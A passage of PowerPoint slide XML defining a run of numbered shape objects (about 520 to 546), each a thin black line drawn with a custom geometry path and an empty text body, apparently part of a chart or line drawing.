          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7810440" y="5258831"/>
            <a:ext cx="2517" cy="431612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="217805">
                <a:moveTo>
                  <a:pt x="974" y="217415"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="217415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="217691"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="object 521"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7838620" y="5346473"/>
            <a:ext cx="0" cy="344788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="173989">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="173463"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="object 522"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836963" y="5346473"/>
            <a:ext cx="2517" cy="344788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="173989">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="173463"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="object 523"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866527" y="5356651"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168327"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="object 524"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866255" y="5356900"/>
            <a:ext cx="1258" cy="333462"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="168275">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="168202"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="object 525"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7893832" y="5421001"/>
            <a:ext cx="0" cy="269287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="135889">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="135854"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="object 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7891381" y="5421247"/>
            <a:ext cx="2517" cy="269287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="135889">
                <a:moveTo>
                  <a:pt x="0" y="135454"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="135730"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="object 527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921738" y="5420499"/>
            <a:ext cx="0" cy="270545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="136525">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="136103"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="object 528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921464" y="5421001"/>
            <a:ext cx="0" cy="269287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="135889">
                <a:moveTo>
                  <a:pt x="0" y="135578"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135854"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="object 529"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949644" y="5492891"/>
            <a:ext cx="0" cy="197561"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99694">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="99571"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="object 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949370" y="5494779"/>
            <a:ext cx="2517" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="99060">
                <a:moveTo>
                  <a:pt x="1098" y="98348"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="98348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="98624"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="object 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7977498" y="5488034"/>
            <a:ext cx="0" cy="202594"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="102235">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="102029"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="object 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7976141" y="5486939"/>
            <a:ext cx="1258" cy="203852"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="102869">
                <a:moveTo>
                  <a:pt x="0" y="102305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="102581"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="object 533"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8005403" y="5536841"/>
            <a:ext cx="0" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="77469">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="77398"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="object 534"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8005131" y="5538184"/>
            <a:ext cx="1258" cy="152260"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="76835">
                <a:moveTo>
                  <a:pt x="546" y="76445"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="76445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="76721"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="object 535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033255" y="5532026"/>
            <a:ext cx="0" cy="158552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="80010">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="79828"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="object 536"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8030806" y="5530341"/>
            <a:ext cx="2517" cy="161069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="81280">
                <a:moveTo>
                  <a:pt x="0" y="80402"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="80402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="80678"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="object 537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8061163" y="5579194"/>
            <a:ext cx="0" cy="111993"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="56514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="56026"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="object 538"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060889" y="5580824"/>
            <a:ext cx="0" cy="109474"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="55244">
                <a:moveTo>
                  <a:pt x="0" y="54927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="55203"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="object 539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8089069" y="5581876"/>
            <a:ext cx="0" cy="109474"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="55244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="54673"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="object 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8088795" y="5582122"/>
            <a:ext cx="2517" cy="108218"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="54610">
                <a:moveTo>
                  <a:pt x="1098" y="54272"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="54272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="54548"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="object 541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8116648" y="5647045"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="43572">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="object 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8115566" y="5603873"/>
            <a:ext cx="1258" cy="86826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="43814">
                <a:moveTo>
                  <a:pt x="0" y="43296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="43572"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="object 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8144556" y="5650263"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="40314">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="object 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8144556" y="5612463"/>
            <a:ext cx="1258" cy="78018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="39369">
                <a:moveTo>
                  <a:pt x="546" y="38961"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="38961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39237"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="object 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8172408" y="5655625"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="34902">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="object 546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8170229" y="5623187"/>
            <a:ext cx="2517" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
